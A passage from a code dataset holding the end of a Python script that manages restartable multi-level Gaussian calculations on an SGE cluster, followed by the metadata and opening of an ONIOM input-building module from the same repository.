SGE_STDOUT_PATH!')\n raise\n if self.rerun:\n self.last_node = self.status['current_node']\n self.status['last_node'] = self.last_node\n node_list = self.status['node_list']\n self.last_scratch_path = pathlib.Path(self.status[\n 'current_scratch_dir'])\n self.status['last_scratch_dir'] = str(self.last_scratch_path)\n self._get_chk_ln_path()\n self._get_output_scratch_path()\n else:\n self.status['args'] = self.args\n self.status['base_name'] = self._base_name\n node_list = []\n self.status['node_list'] = node_list + [node]\n self.status['current_node'] = node\n self.status['current_scratch_dir'] = str(scratch_path)\n self.status['job_id'] = self.job_id\n self.cwd_path = pathlib.Path('.').resolve()\n self.status['cwd'] = str(self.cwd_path)\n self.log.info('Submitted from {} and will be running in {}'.format(\n self.cwd_path, self.scratch_path))\n self._make_resub_sh_and_cl()\n\n def _get_output_scratch_path(self):\n self.log.debug('Getting path to scratch output')\n output_scratch_path_ = self.status['output_scratch_path']\n if output_scratch_path_ is not None:\n self.output_scratch_path = pathlib.Path(\n output_scratch_path_)\n else:\n self.output_scratch_path = self.last_scratch_path.joinpath(\n self.status['g_in_curr']).with_suffix('.out')\n\n def _get_chk_ln_path(self):\n self.log.debug('Getting path to linked chk file')\n chk_ln_path_ = self.status['chk_ln_path']\n if chk_ln_path_ is not None:\n self.chk_ln_path = pathlib.Path(chk_ln_path_)\n else:\n self.chk_ln_path = pathlib.Path(\n f'{self._base_name}-running.chk').resolve()\n\n @log_exception\n def run_calc(self):\n \"\"\"\n The primary function to start (or restart) running a calculation\n\n :return: None\n \"\"\"\n self.log.debug('Welcome. Just starting to run this calculation')\n self._startup_tasks()\n if self.rerun:\n self.log.info('loaded previous status file: {}'.format(\n self._json_name))\n self.resume_calc()\n else:\n self.log.warning('No previous status file found. '\n 'Starting new calculation?')\n self.new_calc()\n\n def _make_rand_xyz(self):\n self.log.debug('Making XYZ file to start calculation')\n import tables\n u = paratemp.Universe(self.top, self.traj, verbosity=0)\n while True:\n try:\n u.read_data()\n break\n except tables.HDF5ExtError:\n self.log.warning(\n 'HDF5ExtError raised. Likely because trying to read the '\n 'store at the same time as another process. Waiting 5 '\n 'seconds and trying again.')\n time.sleep(5)\n continue\n frames = u.select_frames(self.criteria, 'QM_frames')\n select = random.choice(frames)\n self.status['source_frame_num'] = int(select)\n system: mda.AtomGroup = u.select_atoms('all')\n xyz_name = self._base_name + '.xyz'\n with mda.Writer(xyz_name, system.n_atoms) as w:\n u.trajectory[select]\n for frag in u.atoms.fragments:\n mda.lib.mdamath.make_whole(frag)\n # This should at least make the molecules whole if not\n # necessarily in the correct unit cell together.\n w.write(system)\n self.log.info(f'Wrote xyz file from frame {select} to {xyz_name}')\n return pathlib.Path(xyz_name).resolve()\n\n def _move_reactant_atoms(self, xyz_path):\n self.log.debug('Moving reactant atoms (20 and 39) to '\n f'{self.react_dist}')\n xyz_name = str(xyz_path)\n bak_name = xyz_name + '.bak'\n paratemp.copy_no_overwrite(xyz_name, bak_name)\n self.status['original_xyz'] = bak_name\n self.log.info(f'Copied original geometry to {bak_name}')\n xyz = XYZ(xyz_name)\n diff = xyz.coords[19] - xyz.coords[38]\n direction = diff / np.linalg.norm(diff)\n xyz.coords[19] = xyz.coords[38] + self.react_dist * direction\n xyz.write(xyz_name)\n self.log.info(f'Wrote updated xyz file to {xyz_name}')\n\n def new_calc(self):\n self.log.debug('Setting up a new calculation')\n self.current_lvl = 0\n if self.geometry is not None:\n self.log.debug(f'Using provided geometry from {self.geometry}')\n xyz_path = pathlib.Path(self.geometry).resolve()\n elif self.oniom:\n self.log.debug('Using geometry from ONIOM inputs')\n xyz_path = 'oniom_input'\n else:\n xyz_path = self._make_rand_xyz()\n if self.react_dist:\n if self.oniom:\n self.log.warning('ONIOM calculation with react_dist not '\n 'implemented. Ignoring react_dist.')\n else:\n self._move_reactant_atoms(xyz_path)\n self.status['starting_xyz'] = str(xyz_path)\n if not self.oniom and not xyz_path.exists():\n raise FileNotFoundError('Could not find start geometry that was '\n f'supposed to be at {xyz_path}')\n com_name = self._make_g_in(xyz_path)\n self._setup_and_run(com_name)\n\n def _setup_and_run(self, com_name):\n self.log.debug('Starting setup to run Gaussian')\n bn = self._base_name\n chk_ln_path = pathlib.Path(f'{bn}-running.chk').resolve()\n self.chk_ln_path = chk_ln_path\n self.status['chk_ln_path'] = str(chk_ln_path)\n chk_ln_path.symlink_to(self.scratch_path.joinpath(f'{bn}.chk'))\n self.log.info(f'Linked checkpoint file as {chk_ln_path}')\n if not self.resubmitted:\n self.resub_calc()\n self.status['manual_input'] = None\n self.status['manual_restart'] = None\n self.status['g_in_curr'] = com_name\n self.cleaned_up = False\n self.between_levels = False\n self.status['calc_cutoff'] = None\n self.status['gaussian_failed'] = None\n killed = self._run_gaussian(com_name)\n self.status['calc_cutoff'] = killed\n if killed:\n self.log.info('Exited from function running Gaussian because '\n 'SIGUSR2')\n else:\n try:\n self._check_normal_completion(self.output_scratch_path)\n self.log.info(f'Seemed to correctly finish level '\n f'{self.current_lvl} calculation. Moving on to '\n f'next level')\n self._advance_level()\n finally:\n self._copy_and_cleanup()\n self._next_calc()\n\n def _advance_level(self):\n self.log.debug(f'Advancing from {self.current_lvl}')\n self.between_levels = True\n self.current_lvl += 1\n\n def _make_g_in(self, xyz_path):\n self.log.debug(f'Making new Gaussian input from {xyz_path}')\n bn = self._base_name\n lvl = self.current_lvl\n com_name = f'{bn}-lvl{lvl}.com'\n try:\n mgi_dict = self.mgi_dicts[lvl]\n except IndexError:\n self.log.warning('Seems that there are no more calculation '\n 'levels to complete')\n raise self.NoMoreLevels\n tools.make_gaussian_input(\n out_file=com_name,\n xyz=str(xyz_path),\n job_name=bn,\n checkpoint=f'{bn}.chk',\n rwf=f'{bn}.rwf',\n nproc=self.n_slots, mem=self.mem,\n **mgi_dict\n )\n self.log.info('Wrote Gaussian input for '\n f'level {lvl} job to {com_name}')\n self.status[f'g_in_{lvl}'] = com_name\n return com_name\n\n def _run_gaussian(self, com_name):\n self.log.debug('Doing final setup to run Gaussian')\n out_name = com_name.replace('com', 'out')\n com_path: pathlib.Path = self.cwd_path.joinpath(com_name)\n if not com_path.exists():\n raise FileNotFoundError('Gaussian input {} not found in '\n '{}'.format(com_name, self.cwd_path))\n out_path: pathlib.Path = self.scratch_path.joinpath(out_name)\n self.output_scratch_path = out_path\n self.status['output_scratch_path'] = str(out_path)\n old_sigusr1 = signal.signal(signal.SIGUSR1, self._signal_catch_done)\n old_sigusr2 = signal.signal(signal.SIGUSR2, self._signal_catch_time)\n cl = ['g16', ]\n killed = False\n with com_path.open('r') as f_in, out_path.open('w') as f_out:\n self.log.info('Starting Gaussian with input {} and writing '\n 'output to {}'.format(com_path, out_path))\n self.status['running'] = True\n proc = subprocess.Popen(cl, stdin=f_in, stdout=f_out,\n cwd=str(self.scratch_path))\n self.log.info('Started Gaussian; waiting for it to finish or '\n 'timeout')\n try:\n thread = threading.Thread(target=self._check_proc, args=(proc,))\n thread.start()\n signal.pause()\n except self.TimesUp:\n killed = True\n proc.terminate() # Should be within `with` clause?\n self.log.info('Gaussian process terminated because of SIGUSR2')\n except self.GaussianDone:\n self.log.info('Gaussian process completed')\n finally:\n signal.signal(signal.SIGUSR1, old_sigusr1)\n signal.signal(signal.SIGUSR2, old_sigusr2)\n self.status['running'] = False\n return killed\n\n def _signal_catch_time(self, signum, frame):\n self.log.warning(f'Caught {signal.Signals(signum).name} signal! '\n 'Trying to quit Gaussian')\n raise self.TimesUp\n\n def _signal_catch_done(self, signum, frame):\n self.log.warning(f'Caught {signal.Signals(signum).name} signal! '\n f'Likely, this was because Gaussian process exited')\n raise self.GaussianDone\n\n def _check_proc(self, proc):\n self.log.debug('Started process to check on Gaussian completion')\n while proc.poll() is None:\n time.sleep(15)\n self.log.warning('Gaussian process no longer running. Sending SIGUSR1')\n os.kill(os.getpid(), signal.SIGUSR1)\n\n def _copy_and_cleanup(self):\n self.log.debug('Attempting to copy back files and unlink chk file')\n com_name: str = self.status['g_in_curr']\n cc = self.status['calc_cutoff']\n killed: bool = True if cc is None else cc\n if killed:\n scratch_path = pathlib.Path(self.status['last_scratch_dir'])\n else:\n scratch_path = self.scratch_path\n if not killed:\n out_path = pathlib.Path(com_name.replace('com', 'out'))\n if self.status['gaussian_failed'] is True:\n out_path = self._make_unique_output_path(\n f'{out_path.stem}-failed')\n else:\n out_path = self._make_unique_output_path(com_name[:-4])\n try:\n paratemp.copy_no_overwrite(str(self.output_scratch_path),\n str(out_path))\n self.log.debug(f'Copied back output file to {out_path}')\n except FileExistsError:\n if filecmp.cmp(str(self.output_scratch_path), str(out_path),\n shallow=False):\n self.log.debug(\"Don't need to copy back output as it's already \"\n f\"at {out_path}\")\n else:\n self.log.error('Output files differ; unable to copy back.\\n'\n f'New: {self.output_scratch_path}\\n'\n f'Existing: {out_path}')\n raise\n if self.chk_ln_path.exists():\n self.chk_ln_path.unlink()\n self.log.debug(f'Unlinked checkpoint run file: {self.chk_ln_path}')\n chk_name = f'{self._base_name}.chk'\n scr_chk_path = scratch_path.joinpath(chk_name)\n if scr_chk_path.exists():\n shutil.copy(str(scr_chk_path), chk_name)\n self.log.debug(f'Copied back checkpoint file to {chk_name}')\n else:\n self.log.debug(f'chk file not found at {scr_chk_path} so not '\n f'copied back')\n self.cleaned_up = True\n\n def _make_unique_output_path(self, com_base_name):\n outs = [str(p) for p in self.cwd_path.glob(com_base_name + '-*.out')]\n if not outs:\n new_out = f'{com_base_name}-1.out'\n else:\n def get_ind(s):\n match = re.search(r'(\\d+)\\.out', s)\n return int(match.group(1))\n outs.sort(key=get_ind)\n ind = get_ind(outs[-1])\n new_out = f'{com_base_name}-{ind+1}.out'\n return pathlib.Path(new_out).resolve()\n\n def _check_normal_completion(self, filepath):\n self.log.debug('Attempting to check for completion status of Gaussian')\n output = subprocess.check_output(['tail', '-n', '1', str(filepath)],\n universal_newlines=True)\n if 'normal termination' not in output.lower():\n self.log.error(f'Abnormal termination of Gaussian job in output: '\n f'{filepath}')\n self._qdel_next_job()\n self.status['gaussian_failed'] = True\n raise self.GaussianError('Gaussian did not finish normally. '\n f'See output: {filepath}')\n self.status['gaussian_failed'] = False\n self.log.info(f'Normal termination of Gaussian job! Output at '\n f'{filepath}')\n\n def resub_calc(self):\n self.log.info(f'resubmitting job with the following commandline:\\n'\n f'{self.resub_cl}')\n proc = subprocess.run(self.resub_cl,\n stdout=subprocess.PIPE,\n stderr=subprocess.STDOUT,\n universal_newlines=True)\n self.log.info(f'The following was returned from qsub:\\n{proc.stdout}')\n if proc.returncode:\n self.log.exception('Resubmission of calculation failed with '\n f'returncode {proc.returncode}')\n match = re.search(r'(\\d+)\\s\\(\"(\\w.*)\"\\)', proc.stdout)\n if match:\n self.next_job_id = match.group(1)\n self.resubmitted = True\n else:\n self.log.warning('Could not find submitted job id from qsub '\n 'command. Will not be able to cancel it if this '\n 'Calc is completed')\n\n def _make_resub_sh_and_cl(self):\n \"\"\"\n Make command line for a calculation for resuming in another job\n\n Requires SGE_STDOUT_PATH and JOB_ID for running `qstat`\n :return: None\n \"\"\"\n self.log.debug('Setting up for calculation resubmission')\n arg_d = dict(pe=f'omp {self.n_slots}', M='[email protected]', m='eas',\n l=f'h_rt={self.h_rt}', N=self._base_name, j='y',\n o=self.stdout_file, notify='', hold_jid=self.job_id)\n resub_dir_path = self.cwd_path.joinpath('resub_scripts')\n resub_dir_path.mkdir(exist_ok=True)\n sub_sh_path = resub_dir_path.joinpath(f'resub-{self._base_name}.sh')\n curr_file = pathlib.Path(__file__).resolve()\n with sub_sh_path.open('w') as sub_sh:\n sub_sh.write('#!/bin/bash -l\\n\\n')\n for key in arg_d:\n sub_sh.write(f'#$ -{key} {arg_d[key]}\\n')\n sub_sh.write(obabel_module_lines)\n sub_sh.write(f'\\n{curr_file} --restart {self._json_name} &\\n\\n')\n sub_sh.write(signal_catch_lines)\n self.log.info(f'Wrote resubmission script to {sub_sh_path}')\n self.resub_cl = ['qsub', str(sub_sh_path)]\n\n def _get_h_rt(self):\n \"\"\"\n Find the amount of time requested for the currently running job\n\n Requires JOB_ID and uses `qstat`.\n :return:\n \"\"\"\n self.log.debug('Attempting to find requested job run time')\n cl = ['qstat', '-j', self.job_id]\n output: str = subprocess.check_output(cl, universal_newlines=True)\n for line in output.splitlines():\n m = re.search(r'h_rt=(\\d+)', line)\n if m:\n self.log.debug(f'Found required info: {m.group(0)}')\n return m.group(1)\n self.log.error('Could not find requested run time! Assuming 24 hours')\n return '24:00:00'\n\n def resume_calc(self):\n self.log.debug('Attempting to resume calculation')\n if not self.cleaned_up:\n self._copy_and_cleanup()\n manual_input = self.status['manual_input']\n manual_restart = self.status['manual_restart']\n if manual_input is not None:\n com_name = self._update_g_in_memory_cpu_request(manual_input)\n self._setup_and_run(com_name)\n elif self.between_levels:\n self._copy_in_restart('chk')\n self._next_calc()\n else:\n if manual_restart is not None:\n com_name = self._update_g_in_memory_cpu_request(manual_restart)\n else:\n com_name = self._update_g_in_for_restart()\n self._copy_in_restart()\n self._setup_and_run(com_name)\n\n def _copy_in_restart(self, file='both'):\n f_type_options = ['chk', 'rwf']\n if file == 'both':\n f_types = f_type_options\n else:\n if file not in f_type_options:\n self.log.warning(f'unrecognized file type {file}; trying it '\n f'anyway...')\n f_types = [file]\n self.log.debug(f'Copying {f_types} files to scratch for restart')\n bn = self._base_name\n for f_type in f_types:\n old_path = self.last_scratch_path.joinpath(f'{bn}.{f_type}')\n if not old_path.exists():\n mes = f'Could not find old {f_type} file at {old_path}'\n self.log.error(mes)\n raise FileNotFoundError(mes)\n new_path = self.scratch_path.joinpath(old_path.name)\n if new_path.exists() and (new_path.stat().st_mtime >\n old_path.stat().st_mtime):\n self.log.debug(f'current {f_type} file newer than old '\n f'({old_path}). Not replacing.')\n else:\n try:\n shutil.copy(str(old_path), str(self.scratch_path))\n except shutil.SameFileError:\n self.log.info('Working on the same node; no need to '\n f'copy {f_type} file')\n self.log.info(f'If necessary, copied {f_types} files from last '\n f'scratch directory: {self.last_scratch_path}\\nto '\n f'node scratch dir: {self.scratch_path}')\n\n def _update_g_in_memory_cpu_request(self, com_name=None):\n self.log.debug('Updating Gaussian memory and cpu request for this node')\n com_name = self.status['g_in_curr'] if com_name is None else com_name\n lines = open(com_name, 'r').readlines()\n paratemp.copy_no_overwrite(com_name, com_name+'.bak')\n with open(com_name, 'w') as f_out:\n for line in lines:\n if '%mem=' in line:\n line = f'%mem={self.mem}GB\\n'\n elif '%cpu=' in line:\n line = f'%cpu=0-{int(self.n_slots)-1}\\n'\n f_out.write(line)\n os.remove(pathlib.Path(com_name+'.bak'))\n self.log.info(f'Updated Gaussian input to use all the memory '\n f'on this node')\n return com_name\n\n def _update_g_in_for_restart(self):\n self.log.debug('Updating Gaussian input for restart')\n com_name = self._update_g_in_memory_cpu_request()\n lines = open(com_name, 'r').readlines()\n paratemp.copy_no_overwrite(com_name, com_name+'.bak')\n with open(com_name, 'w') as f_out:\n for line in lines:\n if line.startswith('#'):\n line = '# Restart\\n'\n f_out.write(line)\n os.remove(pathlib.Path(com_name+'.bak'))\n self.log.info(f'Updated Gaussian input to do a calculation restart')\n return com_name\n\n def _next_calc(self):\n self.log.debug('Moving on to next level calculation')\n out_path = pathlib.Path(self.status['g_in_curr']).with_suffix('.out')\n try:\n xyz_path_str = self._create_opt_xyz(out_path)\n except:\n self.log.error(f'Failed to create xyz file for {out_path}')\n self._qdel_next_job()\n raise\n try:\n com_name = self._make_g_in(xyz_path_str)\n except self.NoMoreLevels:\n self.log.info('No more calculation levels to complete! Completed '\n f'all {self.current_lvl} levels')\n self._qdel_next_job()\n return None\n except FileExistsError:\n self.log.warning(f'Gaussian input file for level '\n f'{self.current_lvl} already exists! This file '\n f'will be used to start a new calculation')\n com_name = f'{self._base_name}-lvl{self.current_lvl}.com'\n self._setup_and_run(com_name)\n # This will get nested, but likely no more than twice (unless the\n # optimizations are very quick). This shouldn't be an issue,\n # and should never get near the recursion limit unless something goes\n # very wrong.\n\n def _qdel_next_job(self):\n self.log.debug('Deleting the re-submitted job from the queue')\n if self.next_job_id is not None:\n cl = ['qdel', self.next_job_id]\n output = subprocess.check_output(cl, stderr=subprocess.STDOUT)\n self.log.info('Cancelled job resubmission. qdel said: '\n f'{output}')\n else:\n self.log.warning('Do not know job id of resubmission so '\n 'unable to delete it.')\n\n def _create_opt_xyz(self, out_path: pathlib.Path):\n self.log.debug('Converting output to xyz file for next level')\n xyz_path_str = str(out_path.with_suffix('.xyz'))\n success = self._run_obabel(out_path, xyz_path_str)\n if success:\n return xyz_path_str\n fchk_path = self._create_fchk()\n success = self._run_obabel(fchk_path, xyz_path_str)\n if success:\n return xyz_path_str\n raise self.NoOptXYZError\n\n def _run_obabel(self, out_path: pathlib.Path, xyz_path_str: str):\n self.log.debug('Running openbabel to convert geometry')\n cl = ['obabel', str(out_path), '-O',\n xyz_path_str]\n proc = subprocess.run(cl, stdout=subprocess.PIPE,\n stderr=subprocess.STDOUT,\n universal_newlines=True)\n if not (proc.returncode or\n '1 molecule converted' not in proc.stdout.lower()):\n self.log.info(f'Converted optimized structure to xyz file: '\n f'{xyz_path_str}')\n return True\n mes = (f'obabel failed to convert {out_path} to an xyz file. '\n f'It said: {proc.stdout}')\n self.log.warning(mes)\n return False\n\n def _create_fchk(self):\n self.log.debug('Converting chk to formatted checkpoint')\n chk_name = f'{self._base_name}.chk'\n fchk_name = f'{self._base_name}.fchk'\n cl = ['formchk', chk_name, fchk_name]\n proc = subprocess.run(cl, stdout=subprocess.PIPE,\n stderr=subprocess.STDOUT,\n universal_newlines=True)\n self.log.debug(f'Ran Gaussian formchk and it said: {proc.stdout}')\n proc.check_returncode()\n return pathlib.Path(fchk_name).resolve()\n\n class SignalMessage(Exception):\n pass\n\n class TimesUp(SignalMessage):\n pass\n\n class GaussianDone(SignalMessage):\n pass\n\n class NoMoreLevels(Exception):\n pass\n\n class GaussianError(Exception):\n pass\n\n class NoOptXYZError(Exception):\n pass\n\n\nclass StatusDict(dict):\n \"\"\"\n A dict subclass that writes the dict to disk every time a value gets set\n\n Note, any other action on the dict will not currently trigger a write to\n disk.\n\n The dict will be written in JSON to the path given at instantiation. If\n there is already a file at that path, it will be read and used as\n the initial definition of the dict. Otherwise, it will be instantiated as\n an empty dict.\n\n Keys in dictionary:\n\n * args: a Dict of the arguments given when starting the calculation.\n\n * current_node: Name of the node on which the job is currently running.\n This is set during :func:`Calc._startup_tasks`. It should be formatted as\n 'scc-xxx' (e.g., 'scc-na1').\n\n * last_node: This is set during :func:`Calc._startup_tasks` if it's a\n restarted calculation. It will be set from the last 'current_node'.\n\n * node_list: This is a list of past and current nodes on which this\n calculation has run.\n\n * current_scratch_dir: str of the absolute path to the scratch directory\n on the current node.\n\n * base_name: the base name for this calculation including the index of\n this calculation.\n\n * cwd: str of the absolute path from which the current calculation was\n submitted.\n\n * last_scratch_dir: str of the absolute path to the scratch directory\n from which the last job was run, if this is not a new calculation.\n\n * source_frame_num: The index of the frame in the trajectory that was\n used to create the initial configuration.\n\n * original_xyz: str of the name of file with the coordinates as they were\n taken from the trajectory, before moving the reacting atoms to the\n correct distance. This will not be set if no distance correction is made.\n\n * starting_xyz: str of the name of the file with the coordinates for\n starting the calculation, before any optimization.\n\n * g_in_0: str of the name of the file with the initial input to Gaussian.\n * g_in_curr: str of the name of the currently running or most recent\n Gaussian input\n\n * current_lvl: int of current level of calculation running (max is len(\n ugt_dicts))\n\n * calc_cutoff: bool of whether the job finished or if it was cutoff\n because of running out of time.\n\n * cleaned_up: bool of whether linked files and old outputs have been\n cleaned up and copied back to the starting directory\n\n * chk_ln_path: str of path to where checkpoint file is linked in\n submission directory\n\n * output_scratch_path: str of path to where output is in the scratch\n directory\n\n * job_id: str of the job number from the sun grid system\n\n * between_levels: bool of if between levels (not in the middle of a\n calculation). Useful for figuring out where to restart.\n\n * gaussian_failed: bool of if Gaussian terminated abnormally. Will be None\n while Gaussian is running and before it gets checked.\n\n * manual_input: str of path to an input file to use to continue the\n calculation. Will not use the chk and rwf files.\n\n * manual_restart: str of path to an input file to use to restart the\n calculation. This will copy in the chk and rwf files that should be\n referenced in the header of the input.\n\n \"\"\"\n def __init__(self, path):\n self.path = pathlib.Path(path).resolve()\n if pathlib.Path(path).is_file():\n d = json.load(open(path, 'r'))\n super(StatusDict, self).__init__(d)\n else:\n super(StatusDict, self).__init__()\n self.log = logging.getLogger(self.__class__.__name__)\n self.temp_path = self.path.with_suffix('.json.new')\n\n def __setitem__(self, key, value):\n try:\n super(StatusDict, self).__setitem__(key, value)\n json.dump(self, open(self.temp_path, 'w'), indent=4)\n os.rename(str(self.temp_path), str(self.path))\n except Exception:\n self.log.exception('Exception raised when trying to write status '\n 'file!')\n raise\n\n _defaults = dict( # args=dict(), # want this to be an Error\n current_node=None,\n last_node=None,\n node_list=list(),\n current_scratch_dir=None,\n base_name=None,\n cwd=None,\n last_scratch_dir=None,\n source_frame_num=None,\n original_xyz=None,\n starting_xyz=None,\n # current_lvl=None, # want this to be an Error\n calc_cutoff=None, cleaned_up=None,\n chk_ln_path=None, output_scratch_path=None,\n job_id=None,\n between_levels=None, gaussian_failed=None,\n manual_input=None, manual_restart=None,\n g_in_curr=None,\n **{f'g_in_{i}': None for i in range(20)})\n\n def __getitem__(self, item):\n try:\n return super(StatusDict, self).__getitem__(item)\n except KeyError as ke:\n self.log.warning(f'Tried to access non-existent key \"{item}\" from '\n 'StatusDict')\n try:\n return self._defaults[item]\n except KeyError:\n raise ke\n\n\ndef _check_environ():\n log.debug('Checking and setting environment variables')\n if os.environ.get('SGE_ROOT', None) is None:\n raise ValueError('SGE_ROOT is not defined')\n if os.environ.get('SGE_CELL', None) is None:\n log.debug('Setting SGE_CELL to default')\n os.environ['SGE_CELL'] = 'default'\n if os.environ.get('DRMAA_LIBRARY_PATH', None) is None:\n lib_path = pathlib.Path(\n f\"{os.environ['SGE_ROOT']}/lib/linux-x64/libdrmaa.so\").resolve()\n log.debug(f'Setting DRMAA_LIBRARY_PATH to {lib_path}')\n os.environ['DRMAA_LIBRARY_PATH'] = str(lib_path)\n\n\ndef _process_paths(paths) -> List[pathlib.Path]:\n log.debug('Processing input paths list')\n statuses = list()\n if not paths:\n log.debug('paths was empty; using current directory')\n paths = [pathlib.Path.cwd()]\n for path in paths:\n path = pathlib.Path(path)\n if path.is_file():\n statuses.append(path)\n continue\n if path.is_dir():\n jsons = path.glob('*.json')\n for j in jsons:\n statuses.append(j)\n log.debug(f'Found {len(statuses)} json files to process')\n return statuses\n\n\ndef get_job_statuses(paths: List[str], df: pd.DataFrame = None):\n log.info('Getting job statuses')\n _check_environ()\n import drmaa\n log.debug('Imported DRMAA package')\n statuses = _process_paths(paths)\n if df is None:\n df = pd.DataFrame(\n {'system': ['str'], 'index': [0],\n 'running_sr': [False], 'running_qr': [False],\n 'current_lvl': [0], 'gaussian_failed': [False]},\n )\n df.drop(labels=[0], axis=0, inplace=True)\n signal.alarm(10) # try to open session for 10 seconds (freezes with some\n # unidentified problems with drmaa\n with drmaa.Session() as session:\n signal.alarm(0) # clear timer if successfully opened session\n log.debug('Opened DRMAA session and finding job statuses')\n for f_status in statuses:\n log.debug(f'Trying file {f_status}')\n name = f_status.stem\n m = re.search(r'(.*)-ind(\\d+)', name)\n if m is None:\n continue\n system, index = m.groups()\n d_status = json.load(f_status.open('r'))\n running = bool(d_status['running'])\n job_id = d_status['job_id']\n try:\n q_running = session.jobStatus(job_id)\n except drmaa.InvalidJobException:\n q_running = None\n lvl = int(d_status['current_lvl'])\n failed = d_status['gaussian_failed']\n df.loc[name] = system, int(index), running, q_running, lvl, failed\n return df.sort_values(['system', 'index'])\n\n\nif __name__ == '__main__':\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument('-n', '--base_name', type=str,\n help='base name for this calculation, likely not '\n 'including any index')\n parser.add_argument('-i', '--index', type=int,\n help='index of this calculation')\n # TODO use mutually exclusive arguments here\n parser.add_argument('-x', '--xyz', type=str, default=None,\n help='manual input geometry (will take precedence '\n 'over topology/trajectory frame selection)')\n parser.add_argument('-c', '--top', type=str, default=None,\n help='topology/structure file (e.g., .gro, .xyz)')\n parser.add_argument('-f', '--trajectory', type=str, default=None,\n help='trajectory file (e.g., .xtc, .trr, .dcd)')\n\n def parse_crit(kvv):\n k, vv = kvv.split('=')\n vs = tuple((float(v) for v in vv.split(',')))\n return k, vs\n\n parser.add_argument('-s', '--criteria', action='append',\n type=parse_crit, metavar='key=min,max',\n help='criteria for selection of possible frames from '\n 'the trajectory. To provide more than one '\n 'criterion, use this argument multiple times')\n parser.add_argument('-d', '--react_dist', type=float, default=False,\n help='Distance to set between atoms 20 and 39, '\n 'in angstroms. If this evaluates to False, '\n 'no changes to the geometry will be made')\n parser.add_argument('-g', '--mgi_dicts', type=str,\n help='path to json file that parses to a list of '\n 'dicts of arguments for make_gaussian_input in '\n 'order to create inputs to Gaussian')\n parser.add_argument('--restart', default=None,\n help='Path to status file for resuming an already '\n 'started calculation')\n parser.add_argument('-j', '--job_status', nargs='*', default=None,\n help='Folders or paths to status files to report the '\n 'status of. If nothing is given, status files in '\n 'current directly will be used. This flag cannot '\n 'be used with any other arguments other than -v.')\n parser.add_argument('-v', '--verbose', action='store_true',\n help='If used, the stdout log will be set to DEBUG')\n p_args = parser.parse_args()\n if p_args.verbose:\n _setup_log(logging.DEBUG)\n else:\n _setup_log()\n if p_args.job_status is not None:\n status_df = get_job_statuses(p_args.job_status)\n print(status_df)\n sys.exit(0)\n elif p_args.restart is not None:\n calc = Calc(status=p_args.restart)\n else:\n _mgi_dicts = json.load(open(p_args.mgi_dicts, 'r'))\n _criteria = None if p_args.criteria is None else dict(p_args.criteria)\n calc = Calc(base_name=p_args.base_name,\n ind=p_args.index,\n geometry=p_args.xyz,\n top=p_args.top,\n traj=p_args.trajectory,\n criteria=_criteria,\n react_dist=p_args.react_dist,\n mgi_dicts=_mgi_dicts\n )\n calc.run_calc()\n"
},
{
"alpha_fraction": 0.5684356689453125,
"alphanum_fraction": 0.5744384527206421,
"avg_line_length": 43.28697204589844,
"blob_id": "4038d78488ec6501e3cfdfc89f8dcdf82b528046",
"content_id": "216f6ae980c69df9af71173430c5680f900091bc",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 25155,
"license_type": "permissive",
"max_line_length": 127,
"num_lines": 568,
"path": "/gautools/oniom.py",
"repo_name": "theavey/QM-calc-scripts",
"src_encoding": "UTF-8",
"text": "\"\"\"\nA set of tools for setting up Gaussian ONIOM calculations\n\"\"\"\n\n\n########################################################################\n# #\n# This script was written by Thomas Heavey in 2019. #\n# [email protected] [email protected] #\n# #\n# Copyright 2019 Thomas J. Heavey IV #\n# #\n# Licensed under the Apache License, Version 2.0 (the \"License\"); #\n# you may not use this file except in compliance with the License. #\n# You may obtain a copy of the License at #\n# #\n# http://www.apache.org/licenses/LICENSE-2.0 #\n# #\n# Unless required by applicable law or agreed to in writing, software #\n# distributed under the License is distributed on an \"AS IS\" BASIS, #\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or #\n# implied. #\n# See the License for the specific language governing permissions and #\n# limitations under the License. #\n# #\n########################################################################\n\nimport collections\nimport logging\nimport re\nfrom typing import List, Union, Tuple, Dict\n\nimport MDAnalysis\nimport numpy as np\nimport parmed\n\n__all__ = ['OniomUniverse']\n\nlog = logging.getLogger(__name__)\n\n\nclass NoStructureException(Exception):\n pass\n\n\nclass OniomStructure(object):\n\n def __init__(self,\n structure: parmed.structure.Structure = None,\n structure_file: str = None,\n structure_args: Union[Tuple, List] = None,\n structure_kwargs: dict = None,\n only_unique_types: bool = False,\n only_used_terms: bool = True):\n \"\"\"\n Initialize OniomStructure to create Gaussian Amber MM input section\n\n :param structure_file: filename (first argument) to be provided to\n instantiate the Structure\n :param structure_args: arguments to be provided to instantiate the\n Structure\n :param structure_kwargs: keyword arguments to be provided to instantiate\n the Structure\n :param only_unique_types: If False (default), all bonds, angles,\n dihedrals, and impropers will be included.\n If True, only the unique elements for each of those will be\n included, which may not define the terms for all possible\n interactions because one type may be used for several atom types.\n For example, there might be an angle_type that should be used for\n \"*-C3-C3\", but it might only get defined for \"H1-C3-C3\".\n :param only_used_terms: If True (default), the params returned will\n only include those with all atoms contained in the atoms actually\n used. This can make the section returned shorter if not all atoms\n have been selected, especially if `only_unique_types` is False.\n This will also require `atoms_used_indices` to be defined, which\n it will be if `molecule_section` is accessed first (in an associated\n OniomUniverse).\n If False, all parameters will be given.\n \"\"\"\n log.debug('Initializing OniomStructure object')\n _struc_args = list() if structure_args is None else structure_args\n _struc_kwargs = dict() if structure_kwargs is None else structure_kwargs\n if structure_file is not None:\n _struc_args = [structure_file] + _struc_args\n if structure is None:\n if (structure_file is None and\n structure_args is None and\n structure_kwargs is None):\n log.warning('No arguments given to initialize OniomStructure')\n raise NoStructureException\n else:\n self.structure = parmed.load_file(*_struc_args,\n **_struc_kwargs)\n else:\n self.structure = structure\n self.only_unique_types = only_unique_types\n self._unique_types = {\n 'bonds': self._get_bond_types_uniq(),\n 'angles': self._get_angle_types_uniq(),\n 'dihedrals': self._get_dihedral_types_uniq(),\n 'impropers': self._get_improper_types_uniq()\n }\n self._non_unique_types = {\n 'bonds': self._get_bond_types_nu(),\n 'angles': self._get_angle_types_nu(),\n 'dihedrals': self._get_dihedral_types_nu(),\n 'impropers': self._get_improper_types_nu()}\n self._types_dict = {True: self._unique_types,\n False: self._non_unique_types}\n self.atoms_used_indices = None\n self.only_used_terms = only_used_terms\n\n @property\n def params_section(self) -> List[str]:\n \"\"\"\n Parameter specification for Gaussian job using Amber MM\n\n :return: The lines to be included for 